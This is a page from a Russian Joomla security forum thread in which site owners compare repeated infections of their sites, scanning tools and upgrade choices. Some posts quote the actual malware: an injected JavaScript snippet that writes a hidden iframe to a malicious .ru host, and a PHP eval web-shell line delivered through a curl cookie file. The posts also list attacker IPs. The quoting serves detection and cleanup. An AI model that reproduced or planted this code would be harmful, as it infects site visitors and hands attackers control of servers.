[Решено] Заразились в один день 4 аккаунта по 10 сайтов - страница 9 - Безопасность сайтов на Joomla

У владельцев ботов, вероятно некоторые проблемы "нагрузочными" сайтами. Потому что в крайний раз скрипт пытался прописать в js такой кусок:

или Google сломали уже

или Google сломали уже

На святое покусились?

На этой неделе нашёл у себя на 1-м из сайтов расширения от NoName. Я их удалил, т.к. они не использовались, хотя планировал использовать. Стоял компонент Rereplacer и ещё какой-то плагин. Обновил некоторые компоненты, в том числе и Akeeba Backup до версии 3.4.3, т.к. сайт работает на Joomla 1.5.26.
Сейчас на сайтах всё чисто, ява скрипты не заражены.

от нонумбера надо и папки чистить, он кроме всего еще и в папке медия свою папку создает, этот нонумбер чертов.

Да, и вправду была папка, но пустая. Я её удалил.

Присоединяюсь к теме  Прошу посмотреть в папке images все файлы index.html У меня уже второй сайт (первый в начале апреля) заражают бэкдорами и закачивают информационную страничку с рекламой Joomla.ru, redhost.ru и hostingjoomla.ru Думаю, что виновники именно они. Недаром заражаются именно русскоязычные сайты на Joomla 1.5, первый раз определили, что взломали через текстовый редактор.

Сейчас скрипт ai-bolit "подозревает" файлы:
/libraries/tcpdf/tcpdf.php
/modules/mod_simpleform2/simpleform2.class.php
и некоторые другие. Заражение показывает 5-го марта.
Также есть посторонний код в файлах htaccess в корне и других папках.

Присоединяюсь к теме  Прошу посмотреть в папке images все файлы index.html У меня уже второй сайт (первый в начале апреля) заражают бэкдорами и закачивают информационную страничку с рекламой Joomla.ru, redhost.ru и hostingjoomla.ru Думаю, что виновники именно они. Недаром заражаются именно русскоязычные сайты на Joomla 1.5, первый раз определили, что взломали через текстовый редактор.

Сейчас скрипт ai-bolit "подозревает" файлы:
/libraries/tcpdf/tcpdf.php
/modules/mod_simpleform2/simpleform2.class.php
и некоторые другие. Заражение показывает 5-го марта.
Также есть посторонний код в файлах htaccess в корне и других папках.

Не соглашусь с вами. Скорее всего мы говорим о различных атаках и различных масштабах.
Исходя из полученного практического опыта, можно сказать что целью атакующих является не реклама, а вероятнее всего заражение его машины или генерация траффика.

По теме могу сказать такой момент: обновили/поменяли маркеры.

Так что если вы ищите вредоносный код по маркерам, то стоит взять на вооружение и эти.


UPD:
новые маркеры

Тоже столкнулся уже не первый раз с заражением .js
На текущий момент код следующий
Нашел один хороший инструмент, называется словогрыз утилитка. Качнуть можно тут.
Я обычно делаю архив всего сайта и тупо на компе распаковываю. Указываем утилите путь к распакованной папки, в ней же можно настроить расширение файлов которые стоит проверять. Вобщем я разобрался за пару минут что к чему, плюс есть детальный хелп с примерами и тд. Вобщем ищет в содержимом и заменяет на нужный текст. Единственное с новым кодом который выше стал спотыкаться на строке
Не могу догнать как правильно прописать в строке поиска, чтоб не спотыкался.. А так, всегда меня выручает.. лечит грубо говоря автоматом) Плюс утилита бесплатная.

После благополучного (как я думал) удаления прошлого вирусного кода (/*214afaae*/(function(){ ....)
сегодня обнаружил следующий код на всех сайтах:

//no932apilot
(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
 var cookie = getCookie('uni198239cba9');
 if (cookie == undefined) {
  setCookie('uni198239cba9', true, 345600);   
  document.write('<iframe src="http://cocoraingm.ru/enhance.paymf?default" style="position:absolute;left:-1000px;top:-1000px;" height="119" width="119"></iframe>');
 }
})();
//moon0193918


как же его побороть гада...

После благополучного (как я думал) удаления прошлого вирусного кода (/*214afaae*/(function(){ ....)
сегодня обнаружил следующий код на всех сайтах:

//no932apilot
//moon0193918
как же его побороть гада...

Найти шелл, через который изменяют файлы скриптов

вредоносный код меняющий содержимое файлов .js обычно располагается в папке images, ищите там и удаляйте файлы с расширением php,
содержащие код аналогичный этому
 

и

Так в том то и дело, я удалил все файлы типа b5f5.php и др. там везде был
но они опять появились снова.

и

Код

# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

125.253.118.88	FALSE	/about/	FALSE	0	<?eval(stripslashes(array_pop($_POST)))?>	1

это не искал, спасибо поищу

 24 мая в очередной раз обнаружил файлы вида b5f5.php , все вычистил вроде, сканером прошелся.
 по логам была активность  с IP

37.143.8.247  - 24 мая
46.254.17.192 - 21 и 22 мая
78.110.50.153  - 20, 21 и 22 мая
93.189.42.241 - 20 и 21 мая

Логи вида  37.143.8.247 - - [24/May/2013:23:45:28 +0400] "POST /components/com_contact/views/637069.php

Каждый раз определял что на сайте вирус - Adwords вырубал рекламу, по причине вредоносного ПО на сайте (тут описывал подробней). А так внешне ни какой активности.

Сегодня опять вырубил, ничего не нашел, по логам чисто, прошелся сканером по всем маркерам, указанным в теме, чисто. Буду ждать ответа Google.

Сейчас стоит 1.5.26. Стоит ли прям резко обновляться до 2.5.8? А то вроде и 2.5 заражаются, и обновление проблемы нерешает

Сейчас стоит 1.5.26. Стоит ли прям резко обновляться до 2.5.8? А то вроде и 2.5 заражаются, и обновление проблемы нерешает

а где взяли 2.5.8?

Joomla! 2.5.11 Released

The Joomla Project is pleased to announce the immediate availability of Joomla 2.5.11. This is not a security release. This release fixes some problems introduced in the 2.5.10 release. The Production Leadership Team's goal is...

вы еще на 2.5.6 обновите
за 1.5.* последней и актуальными расширениями меньше следить, что самое важное для 99%, сколько видел сайтов взломаных, а это тысячи, скажу одно, что Вы все лентяи и взломы только из-за вашей лени, уже многие нанимают сторонние организации, либо человека на работу, и платят не малые деньги ежемесячно, и в ряду админов появляются, "администраторы сайтов"(как их в будущем назовут не важно, главное чтоб они работу свою знали и выполняли), а вопрос у всех один "если я поставлю то то что будет, ведь говорят ломают", ответ как божий день, надо следить и работать, как за сайтом так и на самом сайте и не будет таких вопросов

в будущем
не качать варьез
не качать сборки с разных сайтов
качать только с оф. сайтов
обновлять своевременно все расширения

не навешивать на рабочий сайт как на елку новогоднюю всякие "шарики" типа

а я посмотреть
а сайт на коленках делать начинал
а не знал, а попробовать просто
а 100 шаблонов потому что подбирали
а ....
и еще много этих а....

и работа у так сказать новой специальности "админ сайта" начинается с того что каждый новый рабочий день, включив свой ПК, он не в соцсети лезит, а идет по составленному списку на сайты разработчиков и смотрит не обновилось ли что, не найдена ли уязвимость, какие обновления новые появились и что изменено, делов на 15-30 минут ежедневно с утра и все сайты которые ведет в порядке, и есть время заниматься нормальной работай, а не по полгода сайты чистить

конечно у каждого время свое и по разному стоит но думаю пол года жизни ну ни как не стоит в чистках сайтов проводить

как то во так

Ну собственно 2.5.11 и имел ввиду, т.е последнюю актуальную версию. Ну и про хлам всякий тоже уж прям)))) Ну да, стоял JCE И nonumber, ну потому что удобные компоненты. Теперь снес)  А так ничего то больше и не было левого. Да и шаблоны сам делаю.

Конечно придется обновиться до последней. Но в ветке реально много написано, что и и 2.5.8 заражались. Я к чему спрашивал, стоит ли обновляться, что если обновление проблемы не решает, то я могу и через три дня обновиться, а не сейчас, когда минуты лишней нету. А так бы и на 1.5 с удовольствием остался бы. Именно для этого сайта новые «возможности» 2.5 на фиг не нужны в принципы. А так вы правы следить конечно надо. Это проще

Сейчас стоит 1.5.26

Если вы используете сборку j1.5.26 со специфическими компонентами, которых нет для сборки j2.5 и выше.
Другое дело, когда в реализации работы вашего сайта используются стандартный набор Joomla при работе с контентом.

Что касаемо данного вируса, если на вашем сайте имеется уязвимость безопасности, то после чистки от вредоносного кода и сторонних вредоносных фалов с shell доступом к файлам сайта.
Ваш сайт будет в очередной раз заражён. Имеется некая закономерность заражения сайта или сайтов, стабильно через каждые две недели с небольшой погрешностью +- 3-4 дня.

Чтобы полностью понять заражён ваш сайт или ваши сайты, нужно внимательно изучать логи сервера или лог вашего аккаунта у хостинг-провайдера.

Я немного позанимался исследованием поведения данной вирусной атаки на своих сайтах и на выделенный сервер.  Результат получился следующим:     

- на первом этапе, с некого внешнего IP или с нескольких IP адресов производится определение движка сайта. Данная методика определения CMS очень простая.
Существует набор неких шаблонов, которые выполняются последовательными командами. Вся беда известных CMS заключается в том, что они используют открытую SEF технологию т.е. на вашем сайте ссылку к странице или компоненту можно открыть двумя способами:

1. использовать короткую SEF ссылку на запрашиваемую страницу на сайте.
2. использовать первоначальную полную ссылку (без использования SEF оптимизации ссылок).

Таким образом сетевой сканер узнаёт о вашем сайте практически всё. Путём запроса - отклика.

- на втором этапе, с внешнего IP или с нескольких IP адресов ведётся подбор ключей к определённым найденным компонентам, плагинам, модулям, шаблонам... через которые они получают доступ к определённой папке на вашем сайте или сайтах обычно это папка images. Разработчики веб-приложений иногда допускают общую ошибку при работе с файлами на сервере, в условии работы определённого скрипта при работе с графическими фалами имеется не строгие правила загрузки типов графических файлов, а также имеется грубая ошибка, когда загрузка файла несёт в себе первоначальные атрибуты CMOD, либо через тот-же скрипт можно менять CMOD фалов...

Именно через аналогичную уязвимость проникают на ваш сайт или сайты сторонние файлы, например 5464.php имеющие право запуска, не имеющие никакого отношения к вашему сайту. Через эти файлы злоумышленники получают доступ к файловой структуре вашего сайта, а также, они могут получить доступ к логину и паролю БД вашего сайта из файла конфигурации настроек CMS.

Первые признаки симптомов присутствия вируса на вашем сайте или сайтах:

1. Большая нагрузка на ЦП сервера.
2. Медленная работы сайта или сайтов расположенных на одном сервере.
3. В лог-файлах сервера присутствуют многочисленные подозрительные запросы, где очень чётко отображены пути запросов.

Выходом из сложившейся ситуации есть. Нужно хотя бы 2 раза в сутки просматривать содержимого системных лог-фалов сервера.

Алгоритм методики вычисления атаки на сервер я уже продумал. Технически это реализовать возможно.

для этих целей нужно некое серверное приложение работающее по последовательному алгоритму:

Превышен лимит нагрузки на ЦП сервера -> определение нагруженного аккаунта веб-сервера -> сканирование лог-файла, поиск значений соответствующих времени нагрузки на ЦП сервера -> результат поиска, сортировка и группировка исходных значений -> отправка результата системному администратору...

Хотя можно всё это делать и вручную.       

Нужно хотя бы 2 раза в сутки просматривать содержимого системных лог-фалов сервера.

и что сидеть тупо в логи парится и смотреть на ботов которые приходят и нагрузку несут, особенно на vps где при хорошей настройке и не видно нагрузке сайт или нет, ну пришли боты ну ушли, и что с этого

Что касаемо данного вируса, если на вашем сайте имеется уязвимость безопасности, то после чистки от вредоносного кода и сторонних вредоносных фалов с shell доступом к файлам сайта.
Ваш сайт будет в очередной раз заражён. Имеется некая закономерность заражения сайта или сайтов, стабильно через каждые две недели с небольшой погрешностью +- 3-4 дня.

ну бред полный покажите мне полторашку которую в стандарте взломали (именно её), если не дочистили могут и раз в полчаса вас ломать
на счет бреда и полторашки просто одно скажу и это не имхо а действительность, она ломко стойкая, сейчас идет просто переход на более свежую версию в которой больше дыр чем в старой(многие сайты как работающие на 1.0 так и на 1.5 работают и не взламываются), ни кто не работает как и мало работали над поиском дыр в самом движке 1.5.*, всегда обрабатывали и будут только более легкие и массово доступные расширения и в них находили уязвимость это намного проще чем ломать сам движок, вам "пудрят мозг" да начинать стоит сайты делать на новых версиях, НО за ними требуется следить это простой маркетинг ни кто не говорит что "более простое и доступное" вам вылезет либо в ваше время, вы все свое время будете тратить на него "это как наркотик" либо будете нанимать людей и оплачивать эту работу, если проект рабочий то его можно очень легко обезопасить на 1.5.* и не переводить на новые версии а если надо обновить то можно обновить его не как апгрейд а как сделать совершенно новый сайт и проще и намного удобнее чем рабочий сайт переносить, ну а SEO и выдачу ПС при этом можно не потерять и не думая про урлы

сделать совершенно новый сайт и проще и намного удобнее чем рабочий сайт переносить, ну а SEO и выдачу ПС при этом можно не потерять и не думая про урлы

Как это не потерять выдачу? Да еще и не думая про урлы? А что с форумом, с базой игроков? Что с комментариями к статьям?

04.07.2013 Яндекс отправил один из моих сайтов в "вагон для некурящих" из-за присутствующего на нем Malware.JS.Generic (JS).
Перелопатил весь сайт в поисках заразы, перечитал еще раз местные темы по данному вопросу. Сегодня написал в техподдержку Яндекса с просьбой уточнить область заражения. СЕГОДНЯ( ) же получил ответ:

Источником заражения являются js-скрипты сервиса  http://odnaknopka.ru/ , которые находятся на Вашем сайте.
При обращении к odnaknopka.ru/ok2.js с User-Agent мобильного устройства, происходит автоматическое перенаправление посетителей на вредоносные цели.
Советую Вам обратиться к владельцам данного сервиса за комментариями относительно присутствия вредоносного кода для пользователей мобильных устройств.

Возьмите на заметку!

А сам свой скрипт который однукнопку выводит смотрели?

Конечно! А к чему такой вопрос? Можно подробнее?

Моя рекомендация каждому администратору системы Joomla: скачивайте только те расширения, которые прошли через официальный каталог расширений JED.

скачивайте только те расширения, которые прошли через официальный каталог расширений JED.

там тоже хватает... а чтобы далеко не бегать JCE

там тоже хватает...

подтверждаю, + моя тема Расширения с JED...совсем испортились(( (Ps: так как ссылки в старт посте устарели - отмечу что там был просто инклюд произвольного, так сказать "кредита" (credit) со стороннего сайта)
- такой (а может еще и хлеще) сюрприз можно получить в любом расширении с JED

Одно дело, какой-либо дикхэд создает безликий сайт-фантом, фактическии чисто для фишинга простаков и любителей халявы, размещая на нем под соусом расширений кота в мешке, а чаще всего - бэкдоры и вирусы.

Другое дело - расширение отправляется на каталог JED конкретным живым человеком, проходит проверку кода и, после публикации на JED попадает в официальный список уязвимых расширений, где это все видят и имеют возможность принять информированное решение "пользовать - не пользовать".

В первом случае - все мутно и темно, как в царстве грибов: "Держи во тьме. Корьми дерьмом.". Во втором случае - все открыто, прозрачно и профессионально.

Одно дело, какой-либо дикхэд...

Всегда приятно конечно когда тебе пытаются привить зарубежную культуру - но только если это относится к культуре в высоком понимании.
Вроде бы правил форума никто не отменял, а именно

4. Язык общения на форуме - русский. Исключения составляют названия торговых марок, моделей устройств, программных продуктов и аббревиатура устройств.

Запрещается
1. Грубые, нецензурные выражения ...

http://ru.wiktionary.org/wiki/dickhead

Насчет культуры  - я хз.

Насчет культуры  - я хз.